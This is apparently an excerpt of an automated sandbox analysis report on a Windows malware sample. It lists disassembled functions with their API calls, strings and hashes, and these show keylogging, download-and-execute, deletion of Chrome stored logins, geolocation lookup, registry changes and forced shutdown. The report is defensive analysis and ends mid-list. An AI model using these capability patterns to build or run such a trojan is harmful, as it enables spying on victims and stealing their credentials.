                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 0040A416
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • GetKeyState.USER32(00000010), ref: 0040A433
                                • GetKeyboardState.USER32(?), ref: 0040A43E
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00454159 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: __floor_pentium4
                                • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$PkGNG
                                • API String ID: 4168288129-3873169313
                                • Opcode ID: d95690e0b6e6c864278ea550f2cfeefdc475363cedebba9bd57c416b56382187
                                • Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
                                • Opcode Fuzzy Hash: d95690e0b6e6c864278ea550f2cfeefdc475363cedebba9bd57c416b56382187
                                • Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413FCA Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 382registrylibraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041409D
                                • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004140A9
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 0041426A
                                • GetProcAddress.KERNEL32(00000000), ref: 00414271
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                • API String ID: 2127411465-314212984
                                • Opcode ID: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                                • Opcode Fuzzy Hash: 5c1ab5f3fb1cf2b2c54c0a1d939c6765263ff7c3c04796efd8fccf04486207c6
                                • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: 0007e75861983f1ba196b38ac0ac2f4397b59b74266b2e2cb4182d4733177f97
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00406EB0 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 222filenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FBC
                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070A0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DownloadExecuteFileShell
                                • String ID: aF$ aF$C:\Users\user\Desktop\1m70ggeepT.exe$open
                                • API String ID: 2825088817-3600594789
                                • Opcode ID: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                • Instruction ID: 27a8b34c094a82f854f2ee3e6b31e6014a71d41456184bc7540e3ceb6c1d0c01
                                • Opcode Fuzzy Hash: 5505d1f989835e5386e0be1d1f6824a76adf241377c16252f380900cbb29c9cd
                                • Instruction Fuzzy Hash: 6561A171B0830166CA24FB76C8569BE37A59F81748F50093FB942772D2EE3C9905C69B
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040880C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00408811
                                • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004088F2
                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088FF
                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A15
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                • String ID: hdF
                                • API String ID: 1771804793-665520524
                                • Opcode ID: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction ID: 1e810be39857a3d86828f92fa26e793a4655b35e172fafea17edde612d57cc14
                                • Opcode Fuzzy Hash: e4bf9b104c2a4932abe6be63e8df5bb1645f0ee96392f376ac585c53c850bca5
                                • Instruction Fuzzy Hash: 16515F72900209AACF04FB61DD569ED7778AF11308F50417FB946B61E2EF389B48CB99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                  • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                  • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                  • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                  • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                                • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
                                • GetProcAddress.KERNEL32(00000000), ref: 00416872
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                • API String ID: 1589313981-2876530381
                                • Opcode ID: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                                • Opcode Fuzzy Hash: 06b2ed81386eea833f57913314ae7cc45cedb7ecee8fca0ea64c9477fec69274
                                • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F7A7 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
                                  • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
                                  • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                                • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                                • ExitProcess.KERNEL32 ref: 0040F8CA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseExitOpenProcessQuerySleepValue
                                • String ID: 4.9.4 Pro$override$pth_unenc$Mw
                                • API String ID: 2281282204-1121629836
                                • Opcode ID: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
                                • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                                • Opcode Fuzzy Hash: 58c5b883e5d172f22ef58a46adbd46fba81c8570fd30b9f4b5b12bcade53b407
                                • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                                • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                                • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoLocale
                                • String ID: ACP$OCP$['E
                                • API String ID: 2299586839-2532616801
                                • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                                • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                                • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                Download Yara Rule
                                APIs
                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                                • GetLastError.KERNEL32 ref: 0040BA58
                                Strings
                                • [Chrome StoredLogins not found], xrefs: 0040BA72
                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                                • UserProfile, xrefs: 0040BA1E
                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: DeleteErrorFileLast
                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                • API String ID: 2018770650-1062637481
                                • Opcode ID: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                                • Opcode Fuzzy Hash: 7df5978969732fb09709de34775d6ce1a623c26fc4145e618767f27fcf07f662
                                • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                                • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                                • GetLastError.KERNEL32 ref: 0041799D
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeShutdownPrivilege
                                • API String ID: 3534403312-3733053543
                                • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                                • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                                • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                Download Yara Rule
                                APIs
                                • __EH_prolog.LIBCMT ref: 00409258
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                                • FindClose.KERNEL32(00000000), ref: 004093C1
                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000), ref: 00404E4C
                                • FindClose.KERNEL32(00000000), ref: 004095B9
                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                • String ID:
                                • API String ID: 1824512719-0
                                • Opcode ID: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                                • Opcode Fuzzy Hash: f9045dcdb2f3133ff8fba91c5ff4e6bf62ac57e12963de0168c3bd7490a17388
                                • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                Download Yara Rule
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
